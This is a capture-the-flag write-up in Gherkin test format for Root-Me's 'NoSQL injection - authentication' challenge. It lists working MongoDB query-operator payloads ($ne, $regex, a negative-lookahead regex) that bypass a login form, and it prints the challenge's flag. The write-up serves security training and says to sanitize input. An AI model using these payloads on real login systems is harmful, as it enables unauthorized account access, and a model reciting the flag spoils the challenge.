## Version 1.4.0
## language: en

Feature: Solve the challenge
  CTF site:
    www.root-me.org
  Category:
    Web Server
  Page name:
    NoSQL injection - authentication
  CWE:
    CWE-943: Improper Neutralization of Special Elements in Data Query Logic
  Goal:
    Capture the flag
  Recommendation:
    Never send user supplied input directly as a query. Always sanitize first

  Background:
  Hacker's software:
    | <Name>        | <Version>                 |
    | Ubuntu        | 18.04.1 LTS (amd64)       |
    | Google Chrome | 70.0.3538.77 (64-bit)     |
  CTF site information:
    Given I'm at the challenge page
    And the statement says
    """
    Find the username of the hidden user
    """
    And there is an online form to log-in
    """
    http://challenge01.root-me.org/web-serveur/ch38/
    """
    And a field to enter the nickname is displayed
    And a field to enter the password is displayed

  Scenario Outline: Normal use case
    Given I enter <username> and <password>
    When I click the button
    Then I get <text> displayed in the browser

    Examples:
    | <username>  | <password>  | <text>                         |
    | test1       | test1       | Bad username or bad password ! |
    | test2       | test2       | Bad username or bad password ! |

  Scenario Outline: Dynamic detection
  The website is vulnerable to NoSQL injections
    Given I suspect the site is rendered via PHP
    And the most common NoSQL database is MongoDB
    Then I try some of the most common payloads on this conditions
    When I access http://challenge01.root-me.org/web-serveur/ch38/<query>
    Then I get <text> displayed in the browser
    And I conclude that the site is vulnerable to NoSQL injections

    Examples:
    | <query>                            | <text>                              |
    | ?login[$ge]=0&pass[$ge]=0          | ERROR 17007 Unable to execute query |
    | ?login[$ne]=toto&pass[$ne]=toto    | You are connected as : admin        |
    | ?login[$ne]=test&pass[$ne]=toto    | You are connected as : admin        |
    | ?login[$ne]=toto&pass[$regex]=.{1} | You are connected as : admin        |
    | ?login[$ne]=toto&pass[$regex]=.{3} | You are connected as : admin        |
    | ?login[$ne]=admin&pass[$ne]=toto   | You are connected as : test         |

  Scenario: Reconnaissance #1
  I try to force a connection as a user different than admin and test
    When I try to login as someone different than admin with the payload
    """
    ?login[$ne]=admin&pass[$ne]=0
    """
    Then the site says
    """
    You are connected as : test
    """
    When I try to login as someone different than test with the payload
    """
    ?login[$ne]=test&pass[$ne]=0
    """
    Then the site says
    """
    You are connected as : admin
    """
    And I conclude I have to find how to get out of this loop

  Scenario Outline: Reconnaissance #2
  Trying to create a query that ignores admin and test usernames and log me in
    When I access http://challenge01.root-me.org/web-serveur/ch38/<query>
    Then I get an <error message> displayed in the browser
    And I conclude that the comparison query operator $nin don't work

    Examples:
    | <query>                                        | <error message>         |
    | ?login[$nin]=[admin, test]&pass[$ne]=0         | ERROR 17007             |
    | ?login[$nin]='[admin, test]'&pass[$ne]=0       | ERROR 17007             |
    | ?login[$nin]='["admin", "test"]'&pass[$ne]=0   | ERROR 17007             |
    | ?login[$nin]="[admin, test]"&pass[$ne]=0       | ERROR 17007             |
    | ?login[$nin]="['admin', 'test']"&pass[$ne]=0   | ERROR 17007             |
    | ?login[$nin]="['admin', 'test']"&pass[$ne]=0   | ERROR 17007             |

  Scenario: Capturing the flag
  Bypassing admin and test loop by forcing MongoDB to ignore both of them
    When I use a single query that encapsulates two conditions as a payload
    """
    ?login[$regex]=^((?!admin|test).)*$&pass[$ne]=0
    """
    Then I get the flag
    """
    You are connected as : flag{nosqli_no_secret_4_you}
    """
